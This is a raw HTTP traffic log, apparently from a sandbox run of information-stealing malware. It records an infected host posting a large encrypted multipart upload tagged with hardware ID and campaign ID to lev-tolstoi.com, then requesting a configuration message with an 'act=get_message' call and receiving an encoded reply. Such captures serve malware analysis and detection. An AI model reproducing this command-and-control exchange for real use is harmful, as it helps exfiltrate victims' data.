name="pid"1--3YRYN79WNXQICM6JNContent-Disposition: form-data; name="lid"H8NgCl--voideed
2024-12-27 13:42:27 UTC	1124	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ate0jm0u7hnm1hnm5lgl5sfsda; expires=Tue, 22 Apr 2025 07:29:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VwBQ3ffo0TS%2FfK7%2FIgouF9mXoExVLNeV1u7taVfL5Pe0czxrEXdO5ilqx1zYENwILe%2BtSVPc0bN1k5IlXja3zYQNsJVHMcVft6Cj354gvvTPMJlFndh1Jndnx5gMxMQpgB8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bbe4c91c4315-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1603&rtt_var=625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2173&delivery_rate=1717647&cwnd=218&unsent_bytes=0&cid=cb80dfafd05f401d&ts=704&x=0"
2024-12-27 13:42:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:30 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RVTD4JJB9QN9VVA6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570261 Host: lev-tolstoi.com
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: 2d 2d 52 56 54 44 34 4a 4a 42 39 51 4e 39 56 56 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 34 30 31 39 45 36 35 41 46 42 33 32 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 52 56 54 44 34 4a 4a 42 39 51 4e 39 56 56 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 56 54 44 34 4a 4a 42 39 51 4e 39 56 56 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 76 6f 69 64 65 65 64 0d 0a 2d 2d Data Ascii: --RVTD4JJB9QN9VVA6Content-Disposition: form-data; name="hwid"514019E65AFB322223D904AF30EFEBBC--RVTD4JJB9QN9VVA6Content-Disposition: form-data; name="pid"1--RVTD4JJB9QN9VVA6Content-Disposition: form-data; name="lid"H8NgCl--voideed--
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: 94 af 83 6d 6e 7f af 53 f3 ae ea 1f 22 39 20 71 69 84 39 71 ca 15 51 a5 9f ea bd 62 eb 2b d4 ae b5 52 5e 51 c8 1e e8 b7 12 f9 98 44 5f db bc 17 56 a7 f4 af 22 86 ae c3 aa 36 2d bc f6 a7 83 36 7a fb d5 18 21 3f 61 f1 4e c3 c8 8a 36 d3 62 aa 89 a3 af f1 e6 17 b4 e6 67 eb a3 11 ea 63 88 e1 87 be 61 63 c4 1f 8f 70 0b f1 60 04 d5 3a c1 9b 3f ba 87 61 14 b7 73 57 9a 74 0d 22 b1 1f e9 5f 3b 43 e8 3d 10 05 fb 48 ce 08 31 98 a8 d3 93 eb 62 3d 05 03 11 4c 11 92 ba fe a4 11 c0 d8 1e 2b c3 9d a2 d0 1c e5 8d 0d 22 c2 ed 08 2f 13 ad 55 19 3d 4b 16 70 f4 77 78 5b 48 70 4b 12 d3 83 82 1f 71 6f 47 68 7e be 31 62 1b ab 31 a2 fc ba f3 0a 2b e3 8a 35 db 8e 21 13 cb b9 ed f3 6c 16 be 97 7c ec e6 ab 6a 1f 30 aa 9d 6f 41 96 f9 bc bb fe 9c 3f 91 a4 44 55 1c 0c 14 98 a2 e5 6a 39 Data Ascii: mnS"9 qi9qQb+R^QD_V"6-6z!?aN6bgcacp`:?asWt"_;C=H1b=L+"/U=Kpwx[HpKqoGh~1b1+5!l\|j0oA?DUj9
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: d6 9a f4 03 77 57 fc ed 06 9b 8c 97 71 db d2 65 a2 10 07 cf 33 9f eb 3c 2a 41 a8 33 2e e5 e2 39 b2 2b 17 9f 0d 5b 6e bb df 9a 7b c6 61 f2 a9 85 ac 15 d0 ba d7 9d 9e 06 13 50 3f 9e d3 7d 04 af 7e 58 fe b6 cf 61 f3 10 d7 78 bc a2 b8 f4 12 c6 d2 f6 f5 9f 8a bc 26 e3 d9 81 b3 e4 b4 85 dc ea 05 1b d6 24 99 57 56 c1 1e 0a 1a ac af d9 2a 0a 0a 1c dd ad e7 3a 14 7e 1f 62 1a 8b 72 bb 06 8f 8c f8 f9 7f de 48 8b ba 61 0f d7 dc e1 fd 3c c8 7e 92 76 6f 57 70 45 f4 39 7f cf 2f b3 f1 ea 5e 4b a1 ea f9 7a ce de 0e 89 36 b7 cf 06 b7 ef 5b 70 9c 9e d0 28 2f eb dd 29 19 fd 2d ef d4 00 71 a8 d2 04 54 f4 3e fd 70 57 c3 e9 5e 51 d0 48 8b 93 57 0d 27 9b ec 4d 4c 65 87 94 5c 5f 7f 64 04 b6 d7 1f 54 69 03 a7 e0 ce 0f 76 45 ff 7d e8 5f 8c 0f ba 3e 18 c4 7a ae 73 0f d1 ec d9 ca 7f Data Ascii: wWqe3<A3.9+[n{aP?}~Xax&$WV:~brHa<~voWpE9/^Kz6[p(/)-qT>pW^QHW'MLe\_dTivE}_>zs
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: 06 eb 3e 5d 49 20 d9 c9 3c 1f 4e 20 f2 77 41 01 71 a8 c6 71 d6 14 8b 1c 1d 87 86 52 57 5c b3 19 d3 fa c5 2b d8 77 0a d6 ce 15 ea a0 49 32 6c dd 50 9e 60 61 d4 51 d2 e8 5a e2 a3 cd c5 2c bc d0 bb 36 95 67 d4 8d ac 5f 3c 24 bc 76 be db 35 2b 63 a0 0e 5b 58 ca b7 22 03 12 ff 28 f8 a1 2e 81 26 d7 12 19 74 57 2a a2 fb a1 69 10 cf d6 9d 9c 04 b2 69 88 e7 8a 6a 56 46 2d a9 94 73 cb 81 d8 95 7b 05 b8 3d f3 3f ad 36 52 32 6a f0 36 d5 64 d4 f3 c2 53 22 f5 7b 85 c1 13 93 64 e3 57 83 92 8e 56 2e 87 c8 cd 05 df 5c 78 90 1b ea 42 79 db 05 55 79 1f 79 b4 b4 93 d9 76 38 f4 58 41 b4 55 8c 50 92 5a 91 aa bb 72 27 fd b1 e2 4b be a0 a3 5a 4c e5 68 f3 6d 45 92 d5 72 cf 97 50 46 9b 47 7f 2e ca da ee df f6 57 23 3f bd 72 d0 73 41 a3 b7 38 9b 16 0f 03 d9 2b 0e 46 7a 83 d5 87 3d Data Ascii: >]I <N wAqqRW\+wI2lP`aQZ,6g_<$v5+c[X"(.&tW*iijVF-s{=?6R2j6dS"{dWV.\xByUyyv8XAUPZr'KZLhmErPFG.W#?rsA8+Fz=
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: 61 78 b1 9f 8b 0d bf 99 af 4e d8 13 4f 2f c5 47 69 80 fb e7 b4 99 56 27 8c 74 ef 72 c6 11 8c dd dc 99 4a ac 32 ef a2 0c 4e a3 d2 04 1f 9c 85 1b 8d 57 f0 b5 15 d6 26 6a 4e 59 d5 04 74 88 90 d2 85 25 57 75 e3 e6 0d 55 f9 4c 53 da fd dd 8c ac dc 82 f4 d3 64 b7 3e 2a cf 4e b1 fd 8b 53 c8 f5 73 1e ec 5f ae a2 08 c2 df bb 4f 09 ae 1b 17 5d 33 a2 69 c1 2d 24 86 d1 31 48 72 a9 64 85 83 45 f7 f0 35 6b ab b5 ae 18 8e 81 73 93 c9 13 ec 51 49 47 b6 a0 09 c9 9e 47 a4 fc 55 5b c2 7b c7 96 c5 c8 65 90 99 26 9a 3b 47 7f 62 ae 9e 7e 96 db f1 ac 0b 9c f1 aa 34 39 44 a6 12 ae c6 a3 5a 84 ff 83 81 2d af 11 16 4c c1 d5 88 92 c6 8d 8d e5 7e 3f 92 0c 92 2c c9 8f c3 d5 d6 df ae 20 df 37 6e a8 0e cb de 23 4f ce 67 f3 26 6d 4b 09 5e f8 7b 1f ad 14 a2 54 d0 31 ed 4f a3 b1 80 74 fb Data Ascii: axNO/GiV'trJ2NW&jNYt%WuULSd>*NSs_O]3i-$1HrdE5ksQIGGU[{e&;Gb~49DZ-L~?, 7n#Og&mK^{T1Ot
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: 32 b8 f2 8d 22 dc 71 7a 16 4f 18 db 1a df 68 6a 88 f5 b3 5d 75 e2 a7 ce ba f7 c3 de 82 23 87 22 21 f6 d8 7a d5 e3 5c 30 97 00 33 05 15 e6 c7 77 53 fb 9a d6 98 68 05 d2 3e 89 cc 53 4e 7d 6a 29 fc 87 82 dc 76 0c 4c ca 87 1e 5a 40 ad 09 7c 32 8c c0 2a 4b 88 be 8f 89 df 63 d2 c8 9f e7 e9 f4 ab 77 2d 18 e3 9d d0 9a 9e cb 69 13 a9 2b 5d 0f 9c 69 6c 58 af 47 c3 4a 34 57 fb c8 1e 99 cc cb 0a 5f 5d 10 be 1e ee 7a 2c 27 71 a5 b6 2b fb 49 54 d1 5a 18 ae 66 ef 32 7f 4e 3a 39 4e 88 5a 00 16 76 df a5 b6 fd 57 2b e1 a4 8e af 70 50 bf 4d bf 87 5d 90 c5 dc 49 90 77 b5 8f d2 ad 92 ca f6 59 3a f1 3a 70 cb 4f b1 e3 2e 8a 43 15 f1 4f e0 df f9 f8 0f 25 f1 58 32 b8 6d 98 cd 6a 68 ec 55 b9 c0 ff f1 3c 95 60 23 79 0d ba f2 5b f2 94 93 36 ce 4b 7e af 63 ac 70 d4 08 02 bb 72 4f 9a Data Ascii: 2"qzOhj]u#"!z\03wSh>SN}j)vLZ@\|2*Kcw-i+]ilXGJ4W_]z,'q+ITZf2N:9NZvW+pPM]IwY::pO.CO%X2mjhU<`#y[6K~cprO
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: d3 e2 37 99 15 18 4b 5f c0 e9 b1 b3 1f 54 52 9f dc 5e dd f7 60 e5 06 bd 91 52 c0 ee 80 5e 9c 34 d1 9a dd 68 ec ae ed 0e a1 a3 df a3 35 f7 2b 6a de 01 d9 7e 2f 0c af 7e 0c 0f 14 7c 74 04 03 93 43 15 1b 45 84 86 9e d3 e3 be 29 68 ef 69 28 ed 29 99 9e dd 63 a2 ae a0 04 5e a3 2d 47 21 d4 67 cf b8 69 43 7e 30 3e 12 4e 6f 1a d3 a8 a7 7e 3f 4a 9d cd d5 64 0b 53 64 5b 1c 83 92 29 c2 14 3b f9 50 09 70 f2 4d 2e 5b b7 0a 29 35 35 7e d0 5c 97 90 fb 4b f8 fc 62 c5 4f 52 b4 e6 83 49 21 e5 b7 f4 13 b2 c1 7c 0b 24 fe 1a 23 84 6a 5f dd 15 e5 c3 3b 0b c1 b7 70 14 b3 de d0 bf 1c 4a 96 93 84 52 d3 97 52 a9 55 88 e3 b9 ac 18 4a fe fd 9d 0a b0 ce ba 36 d2 a0 e3 86 11 2b f2 39 43 02 94 fd fd 7c b6 85 51 44 3f 6f ce 5e fe eb 05 66 35 78 43 1a 51 44 5e 08 27 8a 21 d5 4e 61 4b 9e Data Ascii: 7K_TR^`R^4h5+j~/~\|tCE)hi()c^-G!giC~0>No~?JdSd[);PpM.[)55~\KbORI!\|$#j_;pJRRUJ6+9C\|QD?o^f5xCQD^'!NaK
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: 7e bd 37 e6 01 4d 7e a5 4d d2 2f 73 3a a0 87 11 a2 4c 89 4a d0 12 af 92 80 b5 c8 55 5b 05 0b be 89 07 a4 fd d7 48 1c ff 12 80 6e 01 5e 42 64 9f dd 10 d1 19 86 9d a8 ba fb be c8 55 a5 c4 ed 0d 04 4f 22 23 f2 2a c7 cb 3a 76 66 1c 37 2f 07 45 a0 76 66 1e c3 14 ac ae 23 fd f4 75 16 63 2e 54 11 9e 7d 9a cf 15 06 f5 f3 7f 17 11 e5 88 fd e7 44 98 af aa ad f0 54 82 d8 70 b3 eb 8c 08 98 6a 83 52 94 80 d2 2d e3 f6 5f 78 35 a1 05 01 32 86 8d 75 20 8e 21 14 d9 c1 c3 f3 cd 7c cf 67 a9 1a fb 29 83 55 f4 ac cc fa ad 44 d8 2c 00 1f 57 15 26 32 20 05 58 0d 2d 30 57 6a f0 75 e2 6d 5c 94 18 78 6d 44 68 43 a5 3f e4 3e 3c ab c2 70 41 30 b6 6b fd 12 fe f2 e7 cc f0 78 fd 3a b7 30 fc 41 43 20 c9 b6 65 f7 af 55 da e7 67 2d 65 de 57 fd b6 80 1d fd ff bd a0 5d 5c 0d 50 fa cf 08 78 Data Ascii: ~7M~M/s:LJU[Hn^BdUO"#*:vf7/Evf#uc.T}DTpjR-_x52u !\|g)UD,W&2 X-0Wjum\xmDhC?><pA0kx:0AC eUg-eW]\Px
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: 69 d9 48 1c aa c9 29 70 49 fa 7f d2 5f 07 f4 77 15 bc fb ff b9 13 72 33 95 7e 1f 7c d3 60 e3 2e 47 89 da d1 a8 84 ed 45 64 72 39 4a da d7 67 77 fd ad 80 b8 cc 56 11 be cb 55 b5 e5 22 ee c6 99 a8 14 df bf 7d e2 fd 74 40 ef 90 d5 9f ff eb 1c 88 75 ad c8 13 e2 55 5c 8e e5 0f 87 97 48 c6 0f 5f 7b 61 ee ff 16 af ef 94 06 5d d0 64 31 04 50 33 85 4b bc d2 8b b7 4d 27 d6 f8 b6 b4 dd 82 56 54 fd 53 54 4c 7b d2 38 4c 9f bd 08 ae 9d 0c 44 a8 8c 85 2d d7 65 2d 20 2d cb c1 e8 da 3b d1 fb 2a 0c 29 d4 4b 15 46 da 52 9c 97 16 53 11 d5 c3 f7 33 5a 19 39 cf 14 e3 2f cb 87 d2 ee d5 1e ac 48 aa 7d 24 75 a7 c7 cb df 16 5a 9c e0 3c 9b 4e 1a d1 9d df 85 db 06 7e f5 93 10 64 df d5 1f 37 98 a7 f6 6c 76 52 8e ec 42 37 e5 68 91 95 46 aa 02 91 57 4f 13 93 04 57 4e de 75 6b 5d ad 33 Data Ascii: iH)pI_wr3~\|`.GEdr9JgwVU"}t@uU\H_{a]d1P3KM'VTSTL{8LD-e- -;*)KFRS3Z9/H}$uZ<N~d7lvRB7hFWOWNuk]3
2024-12-27 13:42:30 UTC	15331	OUT	Data Raw: e7 23 f1 0a 9b 49 5d 55 c6 ab 1d 14 d8 44 22 8e b0 60 ff 15 6c 23 6c 3b f8 e1 2e 05 c1 90 60 22 fb 91 f5 cf 54 09 ac b7 48 6d 03 96 0d 20 6e f6 42 8d 81 63 22 a4 c0 48 c5 ca dd a1 5f 9b 50 ab 11 c9 d3 74 e2 e8 8e 1f 36 e1 9c e5 54 1b 04 7f 9a e7 a7 85 95 19 76 95 4e 5e 45 67 d9 1b 6e 7f 99 12 af 6c bd 33 89 76 46 81 b7 f1 f7 55 eb c0 52 76 eb c0 fa 50 7a 58 26 a0 27 45 68 c7 85 b7 6d 04 69 92 ab c7 f1 ec 38 6f 60 2e 0a ba 4d b9 bb 58 61 34 de eb 8f e7 56 57 e7 0a 1e e7 65 bc 03 84 eb ac a2 8c b2 af d3 19 8b 94 fc 49 e0 bc ce d8 98 fb 8b 96 2e 0b a2 05 44 85 2d 25 57 0e 3c 10 e5 ea 95 fc e5 ad b1 fc a6 69 fd 9f 7d 37 fe e3 25 fd 2c 67 61 fb 1f d8 25 06 9e 7d 90 36 5b dc bf 62 57 12 fa 7d 8d 3d f3 28 28 ff 63 dc 13 da a7 0d f6 b0 ee 5c c5 fd e9 fe c8 6a c7 Data Ascii: #I]UD"`l#l;.`"THm nBc"H_Pt6TvN^Egnl3vFURvPzX&'Ehmi8o`.MXa4VWeI.D-%W<i}7%,ga%}6[bW}=((c\j
2024-12-27 13:42:33 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h6lfcbqkd6fmiu446uq10l8ouc; expires=Tue, 22 Apr 2025 07:29:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Xu5QMthcRLMunegRso4dNOl4cKzucLjRO15%2FPInVItYR82hhFFo0saQpYfBFCy0mvBULhHvjr8%2Fae37JkQVTypSTI4fTCjI1HU9kl7twYz49aWY59mNlHIQxpOhAh%2Bf%2FmU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bbf9489542f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2167&min_rtt=2162&rtt_var=822&sent=198&recv=588&lost=0&retrans=0&sent_bytes=2835&recv_bytes=572805&delivery_rate=1323062&cwnd=231&unsent_bytes=0&cid=697a300a21435c4c&ts=3151&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:35 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 84 Host: lev-tolstoi.com
2024-12-27 13:42:35 UTC	84	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 76 6f 69 64 65 65 64 26 6a 3d 26 68 77 69 64 3d 35 31 34 30 31 39 45 36 35 41 46 42 33 32 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--voideed&j=&hwid=514019E65AFB322223D904AF30EFEBBC
2024-12-27 13:42:35 UTC	1125	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=955jkbt9ckp6962rgjaru0n99a; expires=Tue, 22 Apr 2025 07:29:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1jdVv%2FvPpvZcC7xUbyneL7aZWs7b2tkyO9C6ig%2BE4vOk3J8Uap1LyubtBrSKrTBGXixn0p1N05ja3JU1j8Lxv6Es2eFnlEj5LpZSk4vIWGTApikOk%2BD0swE%2BwdzVxxYRXw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bc16ece843c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1687&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=983&delivery_rate=1630374&cwnd=223&unsent_bytes=0&cid=0fce5251188e0917&ts=747&x=0"
2024-12-27 13:42:35 UTC	230	IN	Data Raw: 65 30 0d 0a 43 68 34 48 56 2f 46 76 4d 43 70 49 53 4e 47 49 6d 4b 33 42 48 4a 77 48 6d 66 4b 38 47 71 41 73 6d 64 51 6a 63 4f 33 5a 49 64 56 52 5a 53 55 69 30 31 55 53 51 6a 77 38 6f 66 75 69 38 65 35 41 73 32 37 74 67 63 35 2f 31 6b 50 31 6f 56 63 5a 67 72 64 4d 74 47 31 77 63 69 54 66 46 30 6c 51 46 47 65 43 34 50 62 44 70 33 69 79 59 75 47 58 6e 6a 61 43 53 75 33 32 47 55 44 42 2b 30 54 33 4d 43 35 36 65 34 70 4e 52 51 68 79 61 72 6e 38 37 4e 32 79 4a 73 41 6f 78 64 33 56 62 74 4e 65 2f 4b 4a 4d 48 4a 69 74 53 4c 70 6b 63 32 59 77 6e 78 70 44 42 44 41 78 71 39 53 33 34 36 70 35 2b 57 4c 77 33 4e 6c 69 78 51 36 31 39 6b 55 45 7a 2b 4d 52 2b 53 68 37 4a 57 33 42 45 6d 30 3d 0d 0a Data Ascii: e0Ch4HV/FvMCpISNGImK3BHJwHmfK8GqAsmdQjcO3ZIdVRZSUi01USQjw8ofui8e5As27tgc5/1kP1oVcZgrdMtG1wciTfF0lQFGeC4PbDp3iyYuGXnjaCSu32GUDB+0T3MC56e4pNRQhyarn87N2yJsAoxd3VbtNe/KJMHJitSLpkc2YwnxpDBDAxq9S346p5+WLw3NlixQ619kUEz+MR+Sh7JW3BEm0=
2024-12-27 13:42:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0